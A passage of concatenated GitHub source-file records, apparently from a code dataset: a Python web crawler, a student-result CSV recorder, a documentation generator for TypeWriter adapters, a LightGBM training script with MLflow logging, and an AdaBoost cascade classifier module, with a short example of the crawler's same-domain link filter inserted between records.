str(raw_html.decode(\"utf-8\"))\n\t\t\ttext_maker = html2text.HTML2Text()\n\t\t\ttext_maker.ignore_links = True\n\t\t\ttext_maker.bypass_tables = False\n\t\t\ttext_maker.escape_snob = True\n\t\t\ttext_maker.ignore_images = True\n\t\t\ttext_maker.ignore_anchors = True\n\n\t\t\tcontent = text_maker.handle(raw_html)\n\n\t\t\treturn content\n\t\texcept:\n\t\t\treturn None\n\telse:\n\t\treturn None\n\n\ndef url_cleaning(website):\n\t\"\"\"\n\tRemoves protocol part from the url, returns the name of the website.\n\tThis is implemented to create \"website2mcc\" dictionary. 
In web crawler,\n\twe only use it to get mcc code for given website from the dictionary.\n\tBecause some websites are written with multiple protocols.\n\t\"\"\"\n\twebsite = website.lower()\n\twebsite = website.replace(\"https://\", \"\")\n\twebsite = website.replace(\"http://\", \"\")\n\twebsite = website.replace(\"https://www.\", \"\")\n\twebsite = website.replace(\"http://www.\", \"\")\n\twebsite = website.replace(\"//www.\", \"\")\n\twebsite = website.replace(\"www.\", \"\")\n\twebsite = website.replace(\" \", \"\")\n\twebsite = website.replace(\"\\xa0\", \"\")\n\n\tif website.endswith(\"/\"):\n\t\twebsite = website[:-1]\n \n\tif website.endswith(\")\") and website.startswith(\"(\"):\n\t\twebsite = website[1:-1]\n \n\treturn website\n\n \t\n\ndef read_website2mcc():\n\t\"\"\"\n\tReads the MCCs from saved dictionary.\n\tWhen we get the web content, we save it with its\n\tmcc code in the file.\n\t\"\"\"\n\twebsite2mcc = {}\n\n\twith open(\"website2mcc\") as f:\n\t\tlines = f.read().splitlines()\n\t\tfor line in lines:\n\t\t\ttoken = line.split(\":\")\n\t\t\twebsite2mcc[token[0]] = token[1]\n\n\treturn website2mcc\n\n\n\n\ndef pipeline(website, filename):\n\n\tfile = open(filename, \"w\", encoding = \"utf-8\")\n\tprint(\"Crawling website: \", website)\n\n\tweb_name = url_cleaning(website)\n\twebsite2mcc = read_website2mcc()\n\t\n\n\tprint(\"url_check: \", url_check(website))\n\tif url_check(website):\n\t\tcontent = get_content(website)\n\n\t\tif content is not None:\n\t\t\tprint(\"web content is not None\")\n\t\t\tcontent_processed = clean_data(content)\n\t\t\tfile.write('%s, %s\\n' % (website, content_processed))\n\n\n\t\t#get url list in the same domain\n\t\turls = get_urls(website)\n\t\tprint(\"number of urls: \", len(urls))\n\t\tfor url in urls:\n\t\t\tif url_check(url):\n\t\t\t\tcontent = get_content(url)\n\t\t\t\tif content is not None:\n\t\t\t\t\tcontent_processed = clean_data(content)\n\t\t\t\t\tfile.write('%s, %s\\n' % (url, content_processed))\n\t\t\t\t\tprint(\"preprocessed \", url)\n\ndef main():\n\t# write the website content to the file\n\tpipeline(\"https://www.musictabletstore.com/\", \"filename\")\n \n\nif __name__ == '__main__':\n\tmain()","repo_name":"basakeskili/Master-Thesis-AI","sub_path":"web_crawler.py","file_name":"web_crawler.py","file_ext":"py","file_size_in_byte":4958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
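The same-domain filter inside get_urls() can be exercised without any network access by parsing an inline HTML snippet; the domain and links below are invented, a trimmed-down protocol stripper stands in for url_cleaning, and html.parser is used instead of html5lib to keep the sketch dependency-light:

from bs4 import BeautifulSoup

html = '''
<a href="https://www.example-shop.com/products">products</a>
<a href="https://www.example-shop.com/about">about</a>
<a href="https://partner-site.org/deal">external</a>
<a href="#top">anchor</a>
'''

def strip_protocol(website):
    website = website.lower()
    for prefix in ("https://www.", "http://www.", "https://", "http://", "www."):
        website = website.replace(prefix, "")
    return website.rstrip("/")

base = "https://www.example-shop.com/"
soup = BeautifulSoup(html, "html.parser")
same_domain = [a.get("href") for a in soup.find_all("a")
               if a.get("href") and "http" in a.get("href")
               and strip_protocol(base) in a.get("href")]
print(same_domain)   # only the two example-shop.com links survive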
+{"seq_id":"2492500665","text":"#!/usr/bin/env python\n\nimport csv\nimport argparse\nimport datetime\nimport pathlib\n\nfrom text_constants import (\n STORE_RESULT_USAGE_EXAMPLE, \n STORE_RESULT_NAME_HELP, \n STORE_RESULT_DOB_HELP, \n STORE_RESULT_SUBJECT_HELP, \n STORE_RESULT_TOTAL_HELP, \n STORE_RESULT_SCORE_HELP, \n STORE_RESULT_STORE_HELP\n)\n\nFIELD_NAMES = ['name', 'dob', 'subject', 'total', 'score', 'percentage']\nSUBJECT_CHOICES = ['Nepali', 'English', 'Math', 'Science', 'Social']\n\ndef validate_date(date_string):\n try:\n return f\"{datetime.datetime.strptime(date_string, '%d-%m-%Y')}\".split(' ')[0]\n except (ValueError):\n raise SystemExit('Invalid date format. Should be DD-MM-YYYY.')\n\ndef validate_score(result):\n if result['score'] > result['total'] or result['score'] < 0 or result['score'] == -0.0:\n raise SystemExit(\n 'Score not in valid range. \\npython3 store_result.py --help, for detail.')\n \ndef validate_file_type(file_name):\n if file_name.find('.csv') == -1:\n raise SystemExit('File extension should be .csv')\n\ndef create_new_file(file_name):\n with open(file_name, 'w', newline='') as new_file:\n new_file_writer = csv.writer(new_file, delimiter=',')\n new_file_writer.writerow(FIELD_NAMES)\n print(f\"New file {file_name}, created.\")\n\ndef check_for_duplicate_record(file_name, result):\n with open(file_name, 'r', newline='') as result_file:\n result_file_reader = csv.DictReader(result_file)\n for row in result_file_reader:\n if row['name'] == result['name'] and row['dob'] == result['dob'] and row['subject'] == result['subject']:\n raise SystemExit('Result already exists.')\n\ndef write_new_record(file_name, result):\n with open(file_name, 'a', newline='') as result_file:\n result_file_writer = csv.DictWriter(\n result_file, fieldnames=FIELD_NAMES)\n result_file_writer.writerow(result)\n print(f\"New record added:\\n{result}\")\n\ndef get_percentage(result):\n percentage = (result['score'] / result['total']) * 100\n \n return round(percentage, 2)\n\nparser = argparse.ArgumentParser(description=STORE_RESULT_USAGE_EXAMPLE,\n formatter_class=argparse.RawDescriptionHelpFormatter)\nparser.add_argument(\"--name\",\n help=STORE_RESULT_NAME_HELP,\n required=True)\nparser.add_argument(\"--dob\", type=validate_date,\n help=STORE_RESULT_DOB_HELP,\n required=True)\nparser.add_argument(\"--subject\",\n choices=SUBJECT_CHOICES,\n help=STORE_RESULT_SUBJECT_HELP,\n required=True)\nparser.add_argument(\"--total\", type=int,\n help=STORE_RESULT_TOTAL_HELP,\n required=True)\nparser.add_argument(\"--score\", type=float,\n help=STORE_RESULT_SCORE_HELP,\n required=True)\nparser.add_argument(\"--store\",\n help=STORE_RESULT_STORE_HELP,\n required=True)\n\n\ndef main(result_dict):\n file_name = result_dict.pop('store')\n\n validate_score(result_dict)\n validate_file_type(file_name)\n\n result_dict['percentage'] = get_percentage(result_dict)\n\n if not pathlib.Path(file_name).exists():\n create_new_file(file_name)\n write_new_record(file_name, result_dict)\n return\n\n check_for_duplicate_record(file_name, result_dict)\n write_new_record(file_name, result_dict)\n\nif __name__ == \"__main__\":\n opts = parser.parse_args()\n\n main(opts.__dict__)\n","repo_name":"leapfrogtechnology/lf-training","sub_path":"Python/RanjanPaudel/task1/store_result.py","file_name":"store_result.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"33697081530","text":"# This file is used for parsing TypeWriter adapter's source code and generating markdown files for the documentation website.\n# Please note that this code is not perfect and may require some manual editing to get the markdown files to look right.\n# This file should not need to be run directly or modified. It is run by the `generate_docs.bat` file inside each adapter folder.\n# (Not to mention this code is a rat's nest. Optimize at your own risk.)\n\nimport os\nimport re\nimport sys\n\nadapterName = \"\"\nadapterDesc = \"\" # Allows markdown\noutPathBase = \"\"\nentryPath = \"\"\n\nif len(sys.argv) == 5:\n adapterName = sys.argv[1]\n adapterDesc = sys.argv[2]\n outPathBase = os.path.abspath(sys.argv[3])\n entryPath = os.path.abspath(sys.argv[4])\n print(outPathBase)\n print(entryPath)\nelse:\n print(\n \"Usage: python parse.py [adapter name] [adapter description] [out path] [entry path]\")\n exit()\n\n\ndef titleCase(str):\n return \" \".join([word[0].upper() + word[1:] for word in str.split(\" \")])\n\n\ndef titleCaseSpaced(str):\n newStr = \" \".join([word[0].upper() + word[1:] for word in str.split(\"_\")])\n return re.sub('([A-Z])', r' \\1', newStr).strip()\n\n\ndef plural(str):\n if str.endswith(\"y\"):\n return str[:-1] + \"ies\"\n elif str.endswith(\"s\"):\n return str\n return str + \"s\"\n\n\ndef getEntryData(data, root, file):\n entryData = {}\n\n # Section\n entryData[\"section\"] = titleCase(\n root.replace(entryPath, \"\").split(\"\\\\\")[-1])\n\n if \"Gate\" in entryData[\"section\"]:\n entryData[\"section\"] = \"Action\"\n if \"Entities\" in entryData[\"section\"]:\n entryData[\"section\"] = \"Speaker\"\n\n # Fields\n entryData[\"fields\"] = []\n for i, line in enumerate(data.splitlines()):\n if line.startswith(\"@Entry(\"):\n entryData[\"name\"] = titleCaseSpaced(\n file).replace(\".kt\", \"\").replace(\" Entry\", \"\")\n entryData[\"fileName\"] = line.split('\"')[1]\n entryData[\"description\"] = line.split('\"')[3].replace(\n f\"[{adapterName.replace(' ', '').replace('Adapter', '')}] \", \"\")\n\n if line.startswith(\"\toverride val\") or line.startswith(\" override val\"):\n line = line.replace(\"override \", \"\")\n field = getField(data, line, i)\n if not field:\n continue\n entryData[\"fields\"].append(field)\n continue\n\n if line.startswith(\"\tval\") or line.startswith(\" val\"):\n field = getField(data, line, i)\n if not field:\n continue\n entryData[\"fields\"].append(field)\n continue\n\n if line.startswith(\"\tprivate val\") or line.startswith(\" private val\"):\n line = line.replace(\"private \", \"\")\n field = getField(data, line, i)\n if not field:\n continue\n entryData[\"fields\"].append(field)\n continue\n\n if line.startswith(\") :\"):\n break\n\n if not entryData:\n return None\n return entryData\n\n\ndef getField(data, line, i):\n field = {}\n\n field[\"name\"] = line.strip().split(\" \")[1].replace(\":\", \"\")\n if (field[\"name\"] == \"id\" or field[\"name\"] == \"name\"):\n return None\n\n field[\"name\"] = titleCaseSpaced(field[\"name\"])\n field[\"name\"] = field[\"name\"].strip()\n\n field[\"type\"] = line.strip().split(\" \")[2].replace(\"Optional\", \"\").replace(\"List\", \"\").replace(\n \"<\", \"\").replace(\">\", \"\").replace(\",\", \"\")\n field[\"optional\"] = \"Optional\" in line\n\n if (\"Trigger\" in field[\"name\"]):\n if (\"Custom\" in field[\"name\"]):\n field[\"name\"] = \"Triggers\"\n field[\"type\"] = \"Trigger\"\n elif (\"Speaker\" in field[\"name\"]):\n field[\"type\"] = \"Speaker\"\n\n desc 
= data.splitlines()[i-1]\n field[\"description\"] = \"\"\n if \"@Help\" in desc:\n field[\"description\"] = desc.split('\"')[1]\n else:\n if \"Trigger\" in field[\"name\"]:\n return None\n elif \"Criteria\" in field[\"name\"]:\n return None\n elif \"Modifiers\" in field[\"name\"]:\n return None\n elif \"Display Name\" in field[\"name\"]:\n return None\n elif \"Speaker\" in field[\"name\"]:\n field[\"description\"] = \"The speaker of the dialogue\"\n elif \"Sound\" in field[\"name\"] and field[\"description\"] == \"\":\n return None\n elif \"Command\" in field[\"name\"] and field[\"description\"] == \"\":\n field[\"description\"] = \"The command to register. Do not include the leading slash.\"\n elif \"Comment\" in field[\"name\"] and field[\"description\"] == \"\":\n return None\n elif field[\"description\"] == \"\":\n field[\"description\"] = \"No description provided\"\n print(\"No description found for field in \" + line.split(\" \")\n [1].replace(\":\", \"\") + \" (\" + field[\"name\"] + \")\")\n\n return field\n\n\ndef createMarkdown(data, root, file):\n entryData = getEntryData(data, root, file)\n if not entryData:\n print(\"No entry data found\")\n return None\n markdown = f\"\"\"import {{{plural(entryData['section'])}Field, EntryField}} from \"@site/src/components/EntryField\";\n\n# {entryData['name']}\n\n{entryData['description']}.\n\n## How could this be used?\n\n\n\n## Fields\n\n<{plural(\"Action\" if \"Dialogue\" in entryData[\"section\"] else entryData[\"section\"])}Field />\n\"\"\"\n for field in entryData[\"fields\"]:\n markdown += f\"\"\"\n\n {field[\"description\"]}\n\n\"\"\"\n return markdown\n\n\ndef main():\n skipFileExistsCheck = False\n noFileReplace = False\n\n if not os.path.exists(outPathBase):\n os.makedirs(outPathBase)\n if not os.path.exists(os.path.join(outPathBase, \"entries\")):\n os.makedirs(os.path.join(outPathBase, \"entries\"))\n\n text = f\"\"\"# {adapterName}\n{adapterDesc}\n\n## Entries\n\"\"\"\n sectionsWritten = []\n\n with open(os.path.join(outPathBase, \"_category_.yml\"), \"w\") as f:\n f.write(f\"label: {adapterName}\")\n\n with open(os.path.join(outPathBase + r\"\\entries\", \"_category_.yml\"), \"w\") as f:\n f.write(f\"label: Entries\")\n\n for root, dirs, files in os.walk(entryPath):\n if \"messengers\" in root:\n continue\n for file in files:\n print(\"--------------------------------------\")\n outputPath = root.replace(entryPath, outPathBase + r\"\\entries\").replace(\n \"entities\", \"speaker\").replace(\"gate\", \"action\")\n\n if not os.path.exists(outputPath):\n os.makedirs(outputPath)\n\n with open(os.path.join(root, file), \"r\") as f:\n data = f.read()\n print(\"Parsing \" + file)\n try:\n markdown = createMarkdown(data, root, file)\n except Exception as e:\n print(f\"Failed to parse {file} ({e})\")\n continue\n if markdown:\n with open(os.path.join(outPathBase, adapterName.replace(\" \", \"\") + \".md\"), \"w\") as f:\n entry = getEntryData(data, root, file)\n\n outputFile = os.path.join(\n outputPath, entry[\"fileName\"] + \".mdx\")\n\n with open(os.path.join(outputPath, \"_category_.yml\"), \"w\") as f:\n f.write(\n f\"label: {plural(titleCaseSpaced(entry['section']))}\\n\")\n\n if entry[\"section\"] not in sectionsWritten:\n text += f\"\"\"\n### {entry[\"section\"]}\n\n| Name | Description |\n| ---- | ----------- |\"\"\"\n sectionsWritten.append(entry[\"section\"])\n\n text += f\"\"\"\n| [{entry[\"name\"]}]({adapterName.replace(\" \", \"\")}/entries/{entry[\"section\"].lower()}/{entry[\"fileName\"]}) | {entry[\"description\"]} 
|\"\"\"\n try:\n if not os.path.exists(outputFile):\n # if os.path.exists(os.path.join(outputPath, file.replace(\".kt\", \".mdx\").replace(\"Entry\", \"\"))):\n # print(\n # f'auto renaming file ({os.path.join(outputPath, file.replace(\".kt\", \".mdx\").replace(\"Entry\", \"\"))} -> {outputFile})')\n # os.rename(os.path.join(outputPath, file.replace(\n # \".kt\", \".mdx\").replace(\"Entry\", \"\")), outputFile)\n # continue\n # ^^ This was a hacky way to quickly rename the files. Just keeping this in case something goes wrong\n with open(outputFile, \"w\") as f:\n f.write(markdown)\n else:\n if not skipFileExistsCheck and not noFileReplace:\n yn = input(\n f\"File already exists: {file.replace('.kt', '.mdx')}. Replace? (y/N/all/none) \")\n elif skipFileExistsCheck:\n yn = \"y\"\n print(\n f\"File already exists: {file.replace('.kt', '.mdx')}, replacing\")\n elif noFileReplace:\n yn = \"n\"\n print(\n f\"File already exists: {file.replace('.kt', '.mdx')}, skipping\")\n if yn.lower() == \"y\":\n print(\"Replacing file\")\n pass\n elif yn.lower() == \"all\":\n skipFileExistsCheck = True\n elif yn.lower() == \"none\":\n noFileReplace = True\n print(\"Skipping file\")\n continue\n elif yn.lower() == \"\":\n print(\"Skipping file\")\n continue\n else:\n print(\"Skipping file\")\n continue\n with open(outputFile, \"w\") as f:\n f.write(markdown)\n except Exception as e:\n print(\n f\"Error writing {file}, putting at base directory ({e})\")\n with open(os.path.join(outPathBase, file.replace(\".kt\", \".mdx\").replace(\"Entry\", \"\")), \"w\") as f:\n f.write(markdown)\n continue\n with open(os.path.join(outPathBase, adapterName.replace(\" \", \"\") + \".md\"), \"w\") as f:\n f.write(text)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MultiverShaun/TypeWriter","sub_path":"documentation/docs/adapters/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":10836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"}
+{"seq_id":"2461761863","text":"import click\nimport pandas as pd\nimport joblib as jb\nimport lightgbm as lgb\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error\nimport json\nfrom typing import List\nimport mlflow\nfrom mlflow.models.signature import infer_signature\nimport os\nfrom dotenv import load_dotenv\nfrom mlflow.tracking import MlflowClient\n\nload_dotenv()\n\nremote_server_uri = os.getenv(\"MLFLOW_TRACKING_URI\")\nmlflow.set_tracking_uri(remote_server_uri)\n\nFEATURES = ['price', 'geo_lat', 'geo_lon', 'building_type', 'level', 'levels',\n 'area', 'kitchen_area', 'object_type', 'year', 'month',\n 'level_to_levels', 'area_to_rooms', 'cafes_0.012', 'cafes_0.08']\n\n\n@click.command()\n@click.argument(\"input_paths\", type=click.Path(exists=True), nargs=2)\n@click.argument(\"output_path\", type=click.Path(), nargs=2)\ndef train(input_paths: List[str], output_path: List[str]):\n \"\"\"\n Train the model and log params, metrics and artifacts in MLflow\n :param input_paths: train (for [0]) and test (for [1]) dataframes\n :param output_path: model (for [0]) and score (for [1]) artifact's path\n :return:\n \"\"\"\n with mlflow.start_run():\n mlflow.get_artifact_uri()\n\n train_df = pd.read_csv(input_paths[0])\n test_df = pd.read_csv(input_paths[1])\n\n x_train = train_df.drop('price', axis=1)\n y_train = train_df['price']\n x_holdout = test_df.drop('price', axis=1)\n y_holdout = test_df['price']\n lgb_train = lgb.Dataset(x_train, y_train)\n lgb_eval = lgb.Dataset(x_holdout, y_holdout, reference=lgb_train)\n params = {\n 'boosting_type': 'gbdt',\n 'objective': 'regression',\n 'metric': {'l1'},\n 'max_depth': 11,\n 'num_leaves': 130,\n 'learning_rate': 0.25,\n 'feature_fraction': 0.9,\n 'bagging_fraction': 0.9,\n 'n_estimators': 1000,\n 'bagging_freq': 2,\n 'verbose': -1\n }\n\n gbm = lgb.train(params,\n lgb_train,\n num_boost_round=200,\n valid_sets=lgb_eval,\n verbose_eval=False,\n early_stopping_rounds=30) # categorical_feature=['building_type']\n jb.dump(gbm, output_path[0])\n\n y_predicted = gbm.predict(x_holdout, num_iteration=gbm.best_iteration)\n score = dict(\n mae=mean_absolute_error(y_holdout, y_predicted),\n rmse=mean_squared_error(y_holdout, y_predicted)\n )\n\n with open(output_path[1], \"w\") as score_file:\n json.dump(score, score_file, indent=4)\n\n signature = infer_signature(x_holdout, y_predicted)\n\n mlflow.log_params(params)\n mlflow.log_metrics(score)\n mlflow.lightgbm.log_model(lgb_model=gbm,\n artifact_path=\"model\",\n registered_model_name=\"real_estate_lgbm\",\n signature=signature)\n\n\nif __name__ == \"__main__\":\n train()\n","repo_name":"SolovyevEvgeniy/DS_project_mlops","sub_path":"src/models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"5849061056","text":"import os\nimport re\nimport random\nimport numpy as np\nfrom sklearn import preprocessing\nfrom cascade_util import __pred_weakclf, __weval, __w_beta_update, __save_weakclf, __load__weakclf\nimport operator\nimport functools\nimport pandas as pd\nfrom sklearn.metrics import *\nfrom sklearn.metrics import cohen_kappa_score\n\n\ndef calc_cm_rcall(y_test, y_pred):#\n\n ct = pd.crosstab(y_test, y_pred, rownames=['True'], colnames=['Predicted'], margins=True)\n\n # Compute confusion matrix\n cm = confusion_matrix(y_test, y_pred)\n \n accuracy = sum(cm[i,i] for i in range(len(set(y_test))))/sum(sum(cm[i] for i in range(len(set(y_test)))))\n recall_all = sum(cm[i,i]/sum(cm[i,j] for j in range(len(set(y_test)))) for i in range(len(set(y_test))))/(len(set(y_test)))\n precision_all = sum(cm[i,i]/sum(cm[j,i] for j in range(len(set(y_test)))) for i in range(len(set(y_test))))/(len(set(y_test)))\n fscore_all = sum(2*(cm[i,i]/sum(cm[i,j] for j in range(len(set(y_test)))))*(cm[i,i]/sum(cm[j,i] for j in range(len(set(y_test)))))/(cm[i,i]/sum(cm[i,j] for j in range(len(set(y_test))))+cm[i,i]/sum(cm[j,i] for j in range(len(set(y_test))))) for i in range(len(set(y_test))))/len(set(y_test))\n \n TP = cm[1,1]\n FP = cm[0,1]\n TN = cm[0,0]\n FN = cm[1,0]\n # Precision for Positive = TP/(TP + FP)\n prec_pos = TP/(TP + FP)\n\n recall_pos = TP/(TP+FN)\n\n # F1 score for positive = 2 * precision * recall / (precision + recall)….or it can be F1= 2*TP/(2*TP + FP+ FN)\n f1_pos = 2*TP/(TP*2 + FP+ FN)\n # TPR = TP/(TP+FN)\n TPR = cm[1,1]/sum(cm[1,j] for j in range(len(set(y_test))))\n # FPR = FP/(FP+TN)\n FPR = cm[0,1]/sum(cm[0,j] for j in range(len(set(y_test))))\n # specificity = TN/(FP+TN)\n Specificity = cm[0,0]/sum(cm[0,j] for j in range(len(set(y_test))))\n MCC = matthews_corrcoef(y_test, y_pred)\n CKappa = cohen_kappa_score(y_test, y_pred)\n\n # w_acc = (TP*20 + TN)/ [(TP+FN)*20 + (TN+FP)] if 20:1 ratio of non-feeding to feeding\n ratio = (TN+FP)/(TP+FN)\n w_acc = (TP*ratio + TN)/ ((TP+FN)*ratio + (TN+FP))\n\n return prec_pos, recall_pos, f1_pos, TPR, FPR, Specificity, MCC, CKappa, w_acc, cm\n\n\ndef rm_files_in_folder(folder):\n# remove files in folder\n import os, shutil\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path): \n shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef list_files_in_directory(mypath):\n\n return [f for f in os.listdir(mypath) if os.path.isfile(os.path.join(mypath, f))]\n\n\n\n# def read_raw_acc_separate_files(meal, rec, winsize):\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# allfiles = list_files_in_directory(folder)\n# file_header = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_'\n# RegExr= file_header+'\\d+.txt'\n# matches = [re.search(RegExr, f) for f in allfiles]\n# files = ([m.group() for m in matches if m])\n\n# # files = [files[0], files[1]]\n# XY = [np.loadtxt(os.path.join(folder, file), delimiter=\",\", unpack=False) for file in files]\n# XY = np.vstack(XY)\n# return XY\n\n\n\n# def read_haar_feat_raw_separate_files(meal, rec, winsize):\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# allfiles = list_files_in_directory(folder)\n# file_header = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_'\n# RegExr= file_header+'\\d+.txt'\n# matches = [re.search(RegExr, f) for f in allfiles]\n# 
files = ([m.group() for m in matches if m])\n\n# # files = [files[0], files[1]]\n# XY = [np.loadtxt(os.path.join(folder, file), delimiter=\",\", unpack=False) for file in files]\n# XY = np.vstack(XY)\n# return XY\n\n\n\n# def read_haar_feat_random_select_samples(meal, rec, winsize, ratio, use_seed):\n# # ratio: negative to positive samples\n\n# if isinstance(meal,str):\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# pos_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_pos.txt'\n# neg_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_neg.txt'\n# XYPos = np.loadtxt(os.path.join(folder, pos_file), delimiter=\",\", unpack=False)\n# XYNeg = np.loadtxt(os.path.join(folder, neg_file), delimiter=\",\", unpack=False)\n# if use_seed: random.seed(1)\n# rand_ind = random.sample(range(0, XYNeg.shape[0]), XYPos.shape[0]*ratio)\n# XYNeg = XYNeg[rand_ind, :]\n\n# XY = np.vstack((XYPos, XYNeg))\n\n# elif isinstance(meal,list):\n# meals = meal\n# XYs = []\n# for meal in meals:\n# folder = os.path.join('/Volumes/SHIBO/BeYourself/BeYourself/PROCESS/P120/wrist/haar_feature/', meal)\n# pos_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_pos.txt'\n# neg_file = 'feat_rec'+str(rec)+'_label_win'+str(winsize)+'_neg.txt'\n# XYPos = np.loadtxt(os.path.join(folder, pos_file), delimiter=\",\", unpack=False)\n# XYNeg = np.loadtxt(os.path.join(folder, neg_file), delimiter=\",\", unpack=False)\n# if use_seed: random.seed(1)\n# rand_ind = random.sample(range(0, XYNeg.shape[0]), XYPos.shape[0]*ratio)\n# XYNeg = XYNeg[rand_ind, :]\n\n# XY = np.vstack((XYPos, XYNeg))\n# XYs.append(XY)\n# XY = np.vstack(XYs)\n\n# return XY\n\n\n\ndef build_strongclf_def_thres(XY, T, mdlpath, verbose = 0):\n \"\"\"\n Parameters\n ---------- \n XY: features and labels\n T: number of iterations, IMPORTANT PARAMETER\n mdlpath: the path where the models are saved\n\n Save\n ----\n model\n f_opt_ind: feature index\n beta\n \"\"\"\n\n # re-order negative and positive samples to match the weight vector\n\n first_time_flag = 1\n\n XYNeg = XY[np.where(XY[:,-1]==0)[0],:]\n XYPos = XY[np.where(XY[:,-1]==1)[0],:]\n XY = np.vstack((XYNeg, XYPos))\n\n y_label = XY[:,-1]\n\n nsamples = XYNeg.shape[0]\n psamples = XYPos.shape[0]\n samples = nsamples + psamples\n \n # number of features\n n_feats = XY.shape[1]-1\n f_list = list(range(n_feats))\n\n if verbose: print('f_list: ', f_list)\n\n if not os.path.exists(mdlpath):\n os.makedirs(mdlpath)\n else:\n rm_files_in_folder(mdlpath)\n \n f_opt_list = []\n \n betas = np.zeros([T])# keep record of all betas in all rounds\n\n if verbose: w_norm_rec = np.zeros([T, samples])\n\n # initialize weights\n w = np.zeros([samples])\n w[:nsamples] = 1/nsamples\n w[nsamples:] = 1/psamples\n\n\n # Iteration\n for t in range(T):\n\n # 1. normalize weights\n w_norm = preprocessing.normalize(w[:,np.newaxis], axis=0, norm = 'l1')\n\n if verbose: print(w_norm)\n if verbose: w_norm_rec[t,:] = w_norm.reshape((1,-1)) # w_norm record\n\n err = np.ones(n_feats)\n\n # for each feature:\n for f in f_list:\n\n # 2. train a classifier h using a single feature.\n w_norm = w_norm.ravel() \n y_pred = __pred_weakclf(XY[:,f].reshape(-1, 1), y_label, w_norm)\n\n # error calculation\n err[f] = __weval(y_label, y_pred, w_norm)\n\n if first_time_flag:\n first_time_flag = 0\n if verbose > 1: \n print('err: ', err)\n print(sorted(range(len(err)), key=lambda k: err[k]))\n\n # 3. 
choose the classifier with lowest error\n f_opt_ind = np.argmin(err)\n if verbose and t%(T/10): print('f_opt_ind: ',f_opt_ind) \n\n errmin = np.amin(err) \n if verbose and t%(T/10) == 0: print('errmin: ',errmin) \n\n f_opt_list.append(f_opt_ind)\n\n # 4. update weights\n w, betas = __w_beta_update(betas, t, errmin, w_norm, samples, y_label, y_pred)\n\n __save_weakclf(XY[:,np.argmin(err)].reshape(-1, 1), \\\n y_label, \\\n os.path.join(mdlpath,str(t)+'.sav'), \\\n f_opt_ind, \\\n betas[t],\\\n os.path.join(mdlpath,str(t)+'_conf.txt'), \\\n w_norm)\n\n feat_list = sorted(range(len(err)), key=lambda k: err[k])\n\n if verbose: \n print('f_opt_list: ', f_opt_list) \n print('err: ', err)\n print(feat_list)\n\n return betas, feat_list\n\n\n\ndef load_strongclf_def_thres(XY, T, mdlpath, verbose = 0):\n \"\"\"\n Load weak classifier and build final strong classifier with default threshold \n after training with training set.\n threshold is not adjustable.\n\n the models are './model/(i).sav'\n\n Parameters\n ---------- \n XY: features and labels\n T: number of iterations, IMPORTANT PARAMETER\n mdlpath: the path where the models are saved\n\n \"\"\"\n\n \n# load and get weak classifiers result\n y_pred_rec = np.zeros([T, XY.shape[0]])\n y_res = np.zeros(XY.shape[0])\n X = XY[:,:-1]\n betas = np.zeros([T])# keep record of all betas in all rounds\n\n for t in range(T):\n h, feat, betas[t] = __load__weakclf(os.path.join(mdlpath,str(t)+'.sav'), \\\n os.path.join(mdlpath,str(t)+'_conf.txt'))\n\n if verbose:\n print('feat: ',feat)\n print('X[:,feat]:', X[:,feat])\n y_pred = h.predict(X[:,int(feat)].reshape(-1, 1))\n y_pred_rec[t,:] = y_pred\n \n# calc classifier threshold\n betas_recip = np.reciprocal(betas)\n alphas = np.log(betas_recip)\n clf_thres = np.sum(alphas)*0.5\n \n y_comb = np.dot(alphas, y_pred_rec)\n \n# get final result\n\n for i in range(y_comb.shape[0]):\n if y_comb[i] < clf_thres:\n y_res[i] = 0\n else:\n y_res[i] = 1\n \n return y_res, clf_thres\n\n\n\ndef load_strongclf_adj_thres(XY, T, clf_thres, mdlpath):\n \"\"\"\n Final strong classifier with adjustable threshold\n\n Load weak classifier and build final strong classifier with adjustable threshold \n after training with training set.\n\n the models are './model/(i).sav'\n\n Parameters\n ---------- \n XY: features and labels\n T: number of iterations, IMPORTANT PARAMETER\n mdlpath: the path where the models are saved\n\n \"\"\"\n\n\n\n# load and get weak classifiers result\n y_predRec = np.zeros([T, XY.shape[0]])\n y_res = np.zeros(XY.shape[0])\n X = XY[:,:-1]\n betas = np.zeros([T])# keep record of all betas in all rounds\n\n for t in range(T):\n h, feat, betas[t] = __load__weakclf(os.path.join(mdlpath,str(t)+'.sav'),\\\n os.path.join(mdlpath,str(t)+'_conf.txt'))\n yPred = h.predict(X[:,feat].reshape(-1, 1))\n y_predRec[t,:] = yPred\n \n# calc classify threshold\n betas_recip = np.reciprocal(betas)\n alphas = np.log(betas_recip)\n \n y_comb = np.dot(alphas, y_predRec) \n \n# print(y_comb)\n\n for i in range(y_comb.shape[0]):\n if y_comb[i] < clf_thres:\n y_res[i] = 0\n else:\n y_res[i] = 1\n \n return y_res\n\ndef update_trnset_with_P_samples(XY, y_res):\n # ind_list = []\n # for i in range(len(y_res)):\n # if y_res[i] == 1:\n # ind_list.append(i)\n # P = XY[ind_list,:]\n P = XY[np.where(y_res==1)[0],:]\n\n return P\n\n\ndef updateTrnsetWithFPtrueSamples(XYCurrTrn, yRes):\n yLabel = 